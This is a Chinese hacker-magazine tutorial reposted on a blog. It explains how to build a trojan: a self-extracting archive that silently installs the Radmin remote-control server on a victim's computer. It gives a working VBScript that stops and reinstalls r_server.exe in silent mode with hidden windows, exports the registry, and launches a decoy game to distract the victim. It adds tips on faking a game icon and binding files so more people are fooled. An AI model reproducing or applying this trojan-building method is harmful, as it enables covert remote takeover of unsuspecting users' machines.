鬼仔's Blog

作者：redbin[S.H.C] QQ 50950204 Email: [email protected]
HttP://WwW.SchoolHacker.COM

该文已经发表与黑客X档案2005年第5期
版权归黑客X档案所有

Radmim作为一款优秀的远程管理工具，深得安全界广大黑黑们的喜爱,从看X刊到现在，看到写Radmim的文章也有不少了，今天特意把看到的东东来作个小补充，让大家把Radmim这款宝马用的更加自在。
在X上，2005年第一期Page42有雪蓓朋友写的“自己丰衣足食”文章对Radmim的使用结合了制作winrar自解压木马的思路确实很不错，不过在使用过程中，我发现了有两处不大妥当的地方，后经自己的测试，终于觅得一新方法解决这两个弊端，So，今天我就冒充一次大菜鸟来把我的方法给大家讲述出来，（只听旁边窃窃私语：redbin脸皮真厚，竟然冒充大菜鸟）
首先我先讲下，按该文制作后所出现的两个弊端：
1.运行后闪出一个黑黑的命令行窗口。
大家按照文章制作后，不知道有没有在自己机器上运行测试一下，不要告诉我你怕中木马，自己配制的东西，自己对它就要有信心嘛！在测试过程中我们发现运行自解压文件后，会弹出那个黑黑的命令行窗口一闪而过，这是怎么回事呢？其实这就是由于我们在制作过程中使用了批处理文件bat。调用运行的是这个批处理文件，而批处理的运行会调用cmd或command来运行命令，因此会弹出那个讨厌的，心烦的，想砸死它，想踩死它（小菜语：你有完没完）的命令行窗口，哎。都弹出这东西了，那运行的人肯定会怀疑的，再菜的也该意识到中招了，当然会检查检查再检查来删除掉我们的木马。以上为弊端一。
2.文件除了运行一个批处理后没有运行其他东西来掩饰我们的木马。
按原文方法制作后，运行制作好的自解压文件后，只会弹出一个命令行窗口，而没其它的玩意，我们先假想一下，如果我们修改下让该程序不再弹出命令行窗口后，运行该文件就会什么反映也没，当然，我所说的什么反映也没是指运行后无任何东东显示在屏幕上，（小菜语：不是有显示一个CMD窗口吗？还有就是反正木马已经在运行后自己安装完毕并运行了，我们还有什么好怕的呢）我晕，首先我说了，我们是假设修改成一个不显示CMD窗口的文件，但是你不觉得运行一个文件，它没有任何显示要比运行它出现一个命令行窗口更加害怕吗？没有任何显示，超级典型的中马特征啊！以上是弊端二。
那该怎么办？嘿嘿，该怎么办就怎么办！下面就由超级大菜鸟redbin给大家讲述自己的办法来实现我们心中理想木马的目标。
首先我们还是要按照原作者的制作方法来制作，只不过不同的是，我们利用的不是bat文件了，我们用vbs文件来实现这个无闪命令行窗口的木马，编写vbs文件，代码如下：（PS:脚本的制作来源于校盟的r4t参与写作完成，在此对他表示感谢）
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("r_server.exe /stop",0)
b=wshshell.run ("r_server.exe /install /silence",0)
c=wshshell.run ("regedit /e reg.reg",0)
d=wshshell.run ("redbin.exe",0)
大家应该有发现我们还要把bat文件的命令移植到vbs里了，是的，vbs文件运行起来有一个好处就是可以让命令无显示运行，这样就可以不再闪出那个讨厌的，心烦的，想砸死的，踩死的（众人皆倒：我晕，又来了）讨厌的cmd窗口，滚一边去吧！（旁边一小菜发言：redbin，为什么你写的vbs里多了一个了一个redbin.exe啊）好，我就是在等人问这个呢，孺子可教也！下面给大家解释一下，这个redbin.exe是我们需要找到一款小游戏或者flash。慢，先别慌着搜索redbin.exe，你搜索不出来的，我自己还不记得啥时候做过一个redbin.exe呢，我的意思是，去找一个小游戏或者flash，也要放到这个自解压文件中去，由redbin.vbs来调用到它，诱惑它运行起来，以此来麻痹那些运行了你的木马的用户，嘿嘿，够阴吧！哈哈哈哈哈（小木头：redbin肯定有癫狂症）好了，不笑了，我下面把制作方法给大家展示一下，我们把r_server.exe AdmDll.dll raddrv.dll redbin.exe redbin.reg redbin.vbs放到一起，然后制作这个自解压文件，同样，我们切换到路径项，在这样放后运行空里写上redbin.vbs然后压缩成我们的自解压文件，现在这个小东东就OK了，当然我们可以再美化一下这个小东西，找一款文件图标，修改工具，或者直接操作出exesope来修改一下之后的图标，让它更加像个游戏图标了，那样就更容易去蒙过好多人了，好了，到这里也就给大家讲完了，不要急着翻页，我还要说上两个东东，我在这里再给大家两个思路，大家可以看下哪种更完美就使用。
1.redbin.vbs里去掉set cmd="redbin.exe",0一行，不过redbin.exe还要放在自解压文件里，然后我们在写释放路径的时候这样写，redbin.vbs&redbin.exe 这样也可以实行redbin.exe文件的运行，当然你会说和第一种没什么区别，在这我只是给大家一介绍那符号，用它可以在一行命令里写个多个命令如此而已。这个没有测试，谁有测试若通过的还请告诉我一声：）
2.我们还是不写set cmd="redbin.exe",0一行，同时也不把redbin.exe文件放入自解压文件，我们可以使用文件捆绑器，把制作的没有redbin.exe的自解压木马与redbin.exe文件合并成一个新的文件。
好了，这两个思路也没什么新意，只是随便给大家介绍一下，文章如有不足之处，还望高手斧正，欢迎大家和我一起交流技术，我的qq：50950204
续：3月20日，又想到了该脚本的不足，我们可以结合以前看过的魔女の条件写的“狙击4899肉鸡一文中”写的的批处理来修改我写的脚本得以制作一个替换掉服务来运行的RADMIN，那样可以让你的木马更加肆意！具体脚本代码我就不写了，以免有骗稿费的嫌疑，如果有愿意和我交流技术的欢迎加我们的群：6160610，谢谢大家！